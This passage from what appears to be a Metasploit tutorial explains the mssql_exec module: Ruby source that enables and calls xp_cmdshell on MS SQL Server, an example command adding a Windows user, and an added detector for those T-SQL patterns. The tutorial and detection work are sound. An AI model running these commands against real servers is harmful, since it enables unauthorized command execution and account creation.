Now we’ll examine what is actually occurring “under the hood” of the module we just worked with, mssql_exec. This allows us to get a feel for how existing code is operating before we write our own. Let’s open the module with a text editor to see how it operates:
root@bt:/opt/framework3/msf3# nano modules/auxiliary/admin/mssql/mssql_exec.rb
The following lines, excerpted from the module, contain a few things worth noting:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL

  def run
    mssql_xpcmdshell(datastore['CMD'], true) if mssql_login_datastore
  end
end
The first line tells us that this module will include all functionality from Metasploit’s core libraries. Next, the class declaration defines this as an auxiliary module, which inherits the characteristics shared by, for example, scanners, denial-of-service vectors, data retrieval, brute force attacks, and reconnaissance attempts. The include statement is probably one of the most important lines, because it pulls in the MS SQL module from the core Metasploit libraries; that module handles all MS SQL–based communications and anything related to MS SQL. Finally, the run method pulls a specific command (CMD) from the Metasploit datastore and hands it to mssql_xpcmdshell, provided the login succeeds.
Let’s examine the MS SQL function in the Metasploit core libraries to get a better understanding of its power. First, open mssql.rb and then mssql_commands.rb with the following commands, each in a different window:
root@bt:/opt/framework3/msf3# nano lib/msf/core/exploit/mssql.rb
root@bt:/opt/framework3/msf3# nano lib/msf/core/exploit/mssql_commands.rb
Press ctrl-W in Nano to search for mssql_xpcmdshell in mssql.rb, and you should find the definition that tells Metasploit how to use the xp_cmdshell procedure, as shown next:

#
# Execute a system command via xp_cmdshell
#
def mssql_xpcmdshell(cmd, doprint=false, opts={})
  force_enable = false
  begin
    res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
    # remainder of the method omitted from this excerpt
  end
end
This listing defines the SQL query to be run against the server as a call to the xp_cmdshell stored procedure, with the cmd variable interpolated into the string and replaced by the command line the user requests to be executed. For instance, an attempt to add a user to the system would execute within MS SQL as EXEC master..xp_cmdshell 'net user metasploit p@55w0rd! /ADD' by setting the cmd variable to 'net user metasploit p@55w0rd! /ADD'.
Now turn your attention to mssql_commands.rb, where the commands to enable the xp_cmdshell procedure live:

# Re-enable the xp_cmdshell stored procedure in 2005 and 2008
def mssql_xpcmdshell_enable(opts={});
  "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
end
Here you can see the sequence of commands issued to re-enable the xp_cmdshell stored procedure in MS SQL Server 2005 and 2008.
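The two query patterns just described (the sp_configure/RECONFIGURE enable sequence and the EXEC master..xp_cmdshell '...' call) are exactly what a database audit trail shows when this module runs. As an added example, not code from the Metasploit project, here is a small Ruby detector that classifies captured T-SQL statements against those patterns; the sample statements are constructed for illustration.

```ruby
# Added example (not part of Metasploit): flag the T-SQL patterns emitted by
# mssql_xpcmdshell_enable and mssql_xpcmdshell in captured SQL Server
# statements (e.g. from a SQL Audit or Extended Events trace).

# Enable step produced by mssql_xpcmdshell_enable: sp_configure 'xp_cmdshell', 1
XP_ENABLE_RE = /sp_configure\s+'xp_cmdshell'\s*,\s*1\b/i
# The 'show advanced options' toggle that precedes it in the same batch
ADV_OPTS_RE  = /sp_configure\s+'show advanced options'\s*,\s*1\b/i
# Execution pattern produced by mssql_xpcmdshell: xp_cmdshell '<cmd>'
# ('' inside the quotes is T-SQL's escaped single quote)
XP_EXEC_RE   = /xp_cmdshell\s+'((?:[^']|'')*)'/i

# Classify one captured statement; returns a hash, or nil when it is benign.
def classify_statement(sql)
  if sql =~ XP_ENABLE_RE
    { kind: :xp_cmdshell_enable, advanced_options_toggled: !!(sql =~ ADV_OPTS_RE) }
  elsif (m = XP_EXEC_RE.match(sql))
    # Undo T-SQL quote escaping so the OS command is reported verbatim
    { kind: :xp_cmdshell_exec, command: m[1].gsub("''", "'") }
  end
end

# Walk a batch of statements (oldest first) and return every hit. An exec
# that follows an enable in the same batch is marked enable_then_exec,
# which is the order the Metasploit module produces when xp_cmdshell is off.
def detect_xp_cmdshell(statements)
  enabled = false
  statements.each_with_index.filter_map do |sql, idx|
    finding = classify_statement(sql) or next
    enabled = true if finding[:kind] == :xp_cmdshell_enable
    finding.merge(index: idx,
                  enable_then_exec: enabled && finding[:kind] == :xp_cmdshell_exec)
  end
end

# Constructed sample batch: normal queries, the enable sequence, then an exec
SAMPLE_STATEMENTS = [
  "SELECT name FROM sys.databases",
  "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;" \
  "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;",
  "EXEC master..xp_cmdshell 'net user metasploit p@55w0rd! /ADD'",
  "UPDATE orders SET status = 'shipped' WHERE id = 42",
].freeze

if __FILE__ == $0
  detect_xp_cmdshell(SAMPLE_STATEMENTS).each { |f| puts f.inspect }
end
```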
Now that you understand the functions we will be using in creating our own module, let’s get started.